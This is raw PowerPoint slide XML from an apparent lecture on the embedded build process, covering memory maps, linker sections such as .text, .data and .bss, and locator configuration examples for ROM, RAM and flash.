          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>System has 128K of ROM, 4KB of SRAM and 1MB of DRAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>DRAM is slow, SRAM is used for fast access data</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(128K-1) - 0x00000000 – 0x0001FFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>SRAM: 128K – (132K-1) – 0x00020000 – 0x00020FFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>DRAM: 1M – (2M-1) – 0x00100000 – 0x001FFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17493197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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mapping Memory Areas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1981200"/>
            <a:ext cx="8229600" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>The compiler / linker helps us do the mapping by placing each compiled object in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>based on the object’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>attributes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>There are four main types of objects:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>TEXT:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> read only, contains executable code, mapped to “.text” section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>LIT:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> read only, contains data (string constants and const variables), mapped to “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>rodata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>DATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: writable initialized data, mapped to “.data”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>BSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> writable un-initialized data, mapped to “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Within each type there may be sub-attributes that map to different sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The stack is a special type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>BSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> that may be mapped into the “.stack” section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The initialization values of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>DATA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> variables are a special type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>LIT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> values mapped to “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>initdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>” section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Small objects that are accessed frequently can be grouped to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>imrpve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> performance in some architectures, they are mapped to “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”, “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>rosdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”, “.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>sbss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>” respectively</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19278391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Sections - example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1676400"/>
            <a:ext cx="7848600" cy="258603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LIT1 = 3;		  // mapped to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;			  // mapped to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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init_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 4;		  // mapped to .data; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                             // value mapped to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>initdat</a:t>
            </a:r>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 			  // mapped to .text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init_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> + LIT1 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bss</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9052839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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The Build Process – Locating (cont)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>The locator receives the memory configuration in a special file. The file format is usually standard. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1" smtClean="0"/>
              <a:t>MetaWare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> supports SVR3 and SVR4 formats)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>The configuration file can be used for the following tasks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Specify how input sections are mapped into output sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Define memory layout – how sections are mapped into physical memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Explicitly assign values to global symbols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10427985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#1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ROM: 0 – (128K-1) - 0x00000000 – 0x0001FFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>RAM: 1M – (2M-1) – 0x00100000 – 0x001FFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="2590800"/>
            <a:ext cx="8915400" cy="33242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128K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   MYRAM: ORIGIN = 0x00100000 LENGTH = 1M</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MYRAM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42452634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#2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1524000"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ROM: 0 – (16K-1) - 0x00000000 – 0x00003FFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>RAM: 1M – (2M-1) – 0x00100000 – 0x001FFFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Loader + code in flash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5970104" y="3276600"/>
            <a:ext cx="762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ROM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="3276600"/>
            <a:ext cx="1676400" cy="2438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743200" y="39624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1"/>
            <a:endCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="4495800"/>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81300" y="3316069"/>
            <a:ext cx="1600200" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Data used by ROM code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3221935" y="5715000"/>
            <a:ext cx="1143000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RAM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2840935" y="3962400"/>
            <a:ext cx="1524000" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Code copied from flash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2840935" y="4547175"/>
            <a:ext cx="1524000" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" smtClean="0"/>
              <a:t>Data used by flash code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5970104" y="4547175"/>
            <a:ext cx="762000" cy="786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Flash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4419600" y="3962400"/>
            <a:ext cx="1550504" cy="5847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4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4419600" y="4495800"/>
            <a:ext cx="1550504" cy="838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274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304800" y="1720850"/>
            <a:ext cx="8534400" cy="50482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RAM_START = 0x00100000;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RAM_SIZE = 1M;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ROM_DATA_SIZE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= 32K;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ROM_DATA_START = RAM_START;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FLASH_RAM_AREA_START = ROM_DATA_START + ROM_DATA_SIZE;</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16K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
